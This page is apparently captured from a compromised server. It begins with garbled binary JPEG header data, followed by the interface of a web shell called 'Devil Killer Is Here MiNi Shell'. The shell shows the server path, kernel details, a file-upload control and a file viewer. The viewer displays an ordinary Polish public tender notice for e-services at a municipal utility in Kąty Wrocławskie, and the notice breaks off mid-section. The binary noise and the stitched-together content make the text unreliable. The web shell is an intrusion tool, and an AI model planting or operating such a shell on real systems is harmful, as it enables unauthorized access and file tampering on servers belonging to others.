JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211110/0026488703-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wdrożenie e-usług publicznych w ZGK Sp. z o.o. w Kątach Wrocławskich<br/>w ramach RPO woj. dolnośl. 2014-2020 współf. ze śr. UE, EFRR<br/><br/>Nr naboru: RPDS.02.01.02-IZ.00-02-409/20<br/>PO RPDS: RPO WD 2014-2020 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarki Komunalnej Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 932195516</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 MAJA 26B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kąty Wrocławskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(71) 316 61 67</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">-</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.sobierajska@zgk-katy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zgk-katy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wdrożenie e-usług publicznych w ZGK Sp. z o.o. w Kątach Wrocławskich<br/>w ramach RPO woj. dolnośl. 2014-2020 współf. ze śr. UE, EFRR<br/><br/>Nr naboru: RPDS.02.01.02-IZ.00-02-409/20<br/>PO RPDS: RPO WD 2014-2020 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4d701ce3-4207-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00264887</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalny Program Operacyjny Województwa Dolnośląskiego 2014-2020 współfinansowany ze środków Unii Europejskiej, Europejskiego Funduszu Rozwoju Regionalnego Numer naboru: RPDS.02.01.02-IZ.00-02-409/20 Program Operacyjny RPDS: RPO WD 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/522529 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym, a Wykonawcami odbywa się poprzez stronę internetową: https://platformazakupowa.pl/transakcja/522529<br/>Link do postępowania dostępny jest na stronie internetowej: https://platformazakupowa.pl/transakcja/522529.<br/>Składanie dokumentów, oświadczeń, zawiadomień, zapytań oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem strony internetowej https://platformazakupowa.pl/transakcja/522529 i formularza Wyślij wiadomość.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne opisane zostały w Regulaminie platformazakupowa.pl, który jest dostępny na stronie internetowej<br/>https://www.platformazakupowa.pl/strona/1-regulamin.<br/>Instrukcja składania ofert dostępna jest na stronie internetowej<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>Przykładowa instrukcja składania oferty w przetargu nieograniczonym jest dostępna na stronie internetowej: https://docs.google.com/document/d/1S_1GyJ5TQoDkIwMQKOcKtU31hkOVU3ZEMqrSXyA2g8w/edit#heading=h.6jynaot9cbnq;<br/>Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku do ilości 10 plików lub spakowanych folderów przy maksymalnej wielkości 150 MB. Przy dużych plikach kluczowe jest łącze internetowe i dostępna przepustowość łącza po stronie serwera platformazakupowa.pl oraz użytkownika.<br/>Składając ofertę zaleca się zaplanowanie złożenia jej z wyprzedzeniem minimum 24h, aby zdążyć w terminie przewidzianym<br/>na jej złożenie w przypadku siły wyższej, jak np. awaria platformazakupowa.pl, awaria Internetu, problemy techniczne<br/>związane z brakiem np. aktualnej przeglądarki, itp.<br/>W przypadku większych plików zalecamy skorzystać z instrukcji pakowania plików dzieląc je na mniejsze paczki po np. 150 MB<br/>każda. Za datę przekazania oferty przyjmuje się datę ich przekazania w systemie poprzez kliknięcie przycisku &#34;Złóż ofertę&#34; w drugim kroku i wyświetlaniu komunikatu, że oferta została złożona.<br/>Sposób sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia określa Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Rodzaj podmiotowych środków dowodowych jakich Zamawiający żąda od Wykonawcy, okres ich ważności oraz formy, w jakich mogą być one składane określa Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od<br/>Wykonawcy.<br/>Zamawiający zaleca, aby Wykonawca stosował następujący format podpisu elektronicznego:<br/>PAdES (PDF Advanced Electronic Signature), który jest formatem podpisu elektronicznego właściwym do podpisywania plików z rozszerzeniem PDF.<br/>W przypadku podpisywania dokumentów za pomocą podpisu elektronicznego XADES zewnętrzny należy pamiętać, aby załączyć dwa pliki – jeden z samym podpisem, a drugi z podpisywanym dokumentem, w przeciwnym razie, w przypadku załączenia tylko jednego pliku, oferta zostanie odrzucona.<br/>Zamawiający wymaga, aby złożona oferta w terminie składania ofert została prawidłowo podpisana podpisem kwalifikowanym, osobistym lub profilem zaufanym, w przeciwnym przypadku, jeżeli oferta nie będzie prawidłowo podpisana lub Wykonawca nie złoży na ofercie podpisu elektronicznego, oferta zostanie odrzucona.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">I. Administratorem danych osobowych jest Zakład Gospodarki Komunalnej Sp. z o.o. w Kątach Wrocławskich, ul. 1-go Maja 26B, Kąty Wrocławskie, tel.:71 / 316 61 67.<br/>II. Dane kontaktowe inspektora ochrony danych<br/>Kontakt z Inspektorem Ochrony Danych Osobowych w sprawach przetwarzania danych osobowych i realizacji państwa praw jest możliwy pod adresem poczty elektronicznej inspektor@zgk-katy.pl, tel.: 71 316 61 67 lub listownie na adres placówki.<br/>III. Cel i podstawa prawna przetwarzania danych<br/>Państwa dane osobowe przetwarzane będą w celu związanym z potrzebą wyłonienia wykonawcy w ramach postępowań o udzielenie zamówienia lub organizacji konkursu realizowanych w trybie wynikającym z odpowiednich przepisów prawa.<br/>Przetwarzanie danych osobowych odbywa się na podstawie art. 6 ust. 1 lit. c RODO (obowiązki prawne ciążące na administratorze), a także innych krajowych lub unijnych przepisów odnoszących się do zamówień i konkursów, przedmiotu<br/>umowy oraz ochrony danych osobowych, w szczególności na podstawie przepisów:<br/>Ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.) /Pzp/, oraz aktów wykonawczych wydanych na podstawie tej ustawy;<br/>Ustawa z dnia 14 lipca 1983r. o narodowym zasobie archiwalnym i archiwach (t.j. Dz. U. z 2020 r. poz. 164).<br/>IV. Okres przechowywania danych<br/>Dane osobowe przechowywane będą przez okres, o którym mowa w art. 78 ust. 1 i ust. 4 ustawy Prawo zamówień publicznych, czyli przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, jeżeli okres obowiązywania<br/>umowy w sprawie zamówienia publicznego przekracza 4 lata, dane osobowe przechowywane będą przez cały okres obowiązywania umowy w sprawie zamówienia publicznego. Dokumentacja jest archiwizowana zgodnie z instrukcją<br/>kancelaryjną obowiązującą u administratora (jednolitym rzeczowym wykazem akt) oraz ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">-</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGK/DOK/TP/04/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wdrożenie systemu informatycznego e-Usług publicznych polegających przede wszystkim na:<br/>1)	wdrożeniu aplikacji eBOK (elektroniczne Biuro Obsługi Klienta), umożliwiającej elektroniczne załatwianie spraw związanych z usługami świadczonymi przez Zamawiającego związane <br/>z gospodarką wodno-kanalizacyjną, a także usługami z zakresu gospodarki odpadami dla podmiotów prowadzących działalność gospodarczą na terenie gminy Kąty Wrocławskie;<br/>2)	wdrożeniu aplikacji Chatbot (eBOT) w postaci elektronicznego asystenta, przypisanego do strony internetowej ZGK Sp. z o.o., który replikuje zachowania ludzkie odpowiadając na najczęściej zadawane pytania Klientów, prowadzi konwersację z odbiorcami o dowolnej <br/>i z dowolnego miejsca. <br/>W ramach zamówienia Wykonawca zobowiązany jest ponadto do:<br/>1)	przekazania Opisu technicznego oferowanego systemu wdrożenia e-Usług<br/>2)	przeprowadzenia szkoleń stacjonarnych dla pracowników Zamawiającego <br/>3)	przygotowania instrukcji korzystania z e-Usług w formacie dokumentacji technicznej możliwym do dostosowania przez Zamawiającego do udostępnienia dla Klientów ZGK Sp. z o.o.<br/>4)	wykonania testów bezpieczeństwa systemu -<br/>5)	przekazania Zamawiającemu praw autorskich na wdrożone przez Wykonawcę e-Usługi. <br/>6)	Nabycie licencji na oprogramowanie enova365.<br/>Przedmiot zamówienia zostanie zrealizowany zgodnie z Harmonogramem prac dotyczącym Etapów i terminów wdrożenia przedmiotu zamówienia:<br/>ETAP I<br/>1.	Przekazanie dokumentu „Opis techniczny oferowanego systemu wdrożenia e-Usług”<br/>2.	Nabycie licencji enova365 <br/>ETAP II <br/>1.	Wdrożenie usługi - Rejestracja nowego konta użytkownika e -BOK <br/>2.	Wdrożenie usługi - Obsługa informacji dotyczącej zużycia wody <br/>ETAP III <br/>1.	Wdrożenie usługi - Obsługa zleceń dotyczących wodomierza<br/>2.	Wdrożenie usługi - Obsługa wniosku o zwrot nadpłaty / wpłaty<br/>3.	Wdrożenie usługi - Zgłoszenie uwagi ogólnej<br/>4.	Wdrożenie usługi - Edycja danych klienta <br/>ETAP IV <br/>1.	Wdrożenie usługi - Obsługa opłat z tytułu faktur za usługi dostarczania wody i odprowadzania ścieków<br/>ETAP V <br/>1.	Wdrożenie usługi - Kalkulator ofertowy usług gospodarki odpadowej<br/>2.	Wdrożenie usługi - Rejestracja klienta usług gospodarki odpadowej<br/>3.	Wdrożenie e-usługi - Generowanie umowy usług gospodarki odpadowej<br/>4.	Wdrożenie e-usługi - Obsługa opłat z tytułu faktur za usługi gospodarki odpadowej<br/>5.	Wdrożenie e-usługi zlecenia okazjonalnego wywozu kontenera <br/>ETAP VI <br/>1.	Wdrożenie e-usługi e - BOT<br/>ETAP VII <br/>1.	Przeprowadzenie szkoleń stacjonarnych dla 8 pracowników Zamawiającego <br/>2.	Przekazanie instrukcji korzystania z e-Usług w formacie dokumentacji technicznej możliwym do dostosowania przez Zamawiającego do udostępnienia dla Klientów ZGK Sp. z o.o.<br/>3.	Przekazanie Zamawiającemu autorskich praw majątkowych na wdrożone <br/>e-usługi<br/>4.	Wykonanie testów bezpieczeństwa systemu<br/>Zamawiający informuje, iż e-Usługi dedykowane będą dla Klientów Zamawiającego (Odbiorców) którymi są:<br/>a)	mieszkańcy gminy Kąty Wrocławskie, korzystający z systemu zbiorowego zaopatrzenia w wodę <br/>i odbioru ścieków komunalnych, a także mający zamiar korzystać z usług ofertowanych przez Zamawiającego;<br/>b)	podmioty gospodarcze prowadzące działalność na terenie gminy Kąty Wrocławskie korzystające z systemu zbiorowego zaopatrzenia w wodę i odprowadzania ścieków oraz korzystające lub zamierzające korzystać z usług Zamawiającego w zakresie gospodarki odpadami;<br/>c)	podmioty publiczne i prywatne prowadzące działalność niegospodarczą na terenie gminy Kąty Wrocławskie korzystające z systemu zbiorowego zaopatrzenia w wodę i odprowadzania ścieków oraz korzystające lub zamierzające korzystać z usług ZGK sp. z o.o. w Kątach Wrocławskich w zakresie gospodarki odpadami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72263000-6 - Usługi wdrażania oprogramowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający zastosuje punktowe wagi kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji serwisu na zgłoszenie Zamawiającego (w czasie trwania gwarancji oraz po jej upływie)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu,<br/>2) spełniają warunki udziału w postępowaniu określone przez zamawiającego w o zamówieniu oraz w dokumentach zamówienia.<br/><br/>Zamawiający określa n/w warunki udziału w postępowaniu:<br/>1) zdolność techniczna lub zawodowa<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże wdrożenie co najmniej dwóch instalacji systemu informatycznego enova365 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, polegającej na elektronicznej obsłudze masowej ilości klientów, wraz z podaniem: <br/>a)	przedmiotu, <br/>b)	wartości,<br/>c)	daty wykonania,<br/>d)	podmiotów, na rzecz których usługi te zostały wykonane<br/>oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego wdrożenia zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (oświadczenie Wykonawcy). <br/>2)	Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże wdrożenie co najmniej jednej instalacji - eBOK (Elektroniczne Biuro Obsługi Klienta) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, polegającej na elektronicznej obsłudze klientów, wraz z podaniem: <br/>a)	przedmiotu, <br/>b)	wartości,<br/>c)	daty wykonania,<br/>d)	podmiotów, na rzecz których usługi te zostały wykonane<br/>z załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego wdrożenia zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (oświadczenie Wykonawcy). <br/>3)	Zamawiający uzna powyższy warunek za spełniony, o ile wykonawca wykaże, iż dysponuje:<br/> co najmniej 1 osobą posiadającą:<br/>a)	wykształcenie wyższe <br/>b)	doświadczenie w kierowaniu, nadzorowaniu co najmniej 2 projektami polegającymi na wdrożeniu systemu enova365 wraz z usługami dodatkowymi oraz wdrożeniu usługi e-BOK;<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek można spełnić łącznie. <br/>Oceniając zdolność techniczną lub zawodową Zamawiający może, na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ <br/>na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału <br/>w postępowaniu o udzielenie zamówienia Zamawiający żąda następujących podmiotowych środków dowodowych: <br/>a)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem składania ofert Wykonawca dokonał płatności należnych podatków lub opłat lub zawarł wiążące porozumienie w sprawie spłat należności;<br/>b)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej KRUS potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, <br/>a w przypadku zalegania z opłacaniem składek na ubezpieczenie społeczne i zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, ze odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne i zdrowotne wraz <br/>z odsetkami lub grzywną lub zawarł wiążące porozumienie w sprawie spłat należności;<br/>c)	oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: 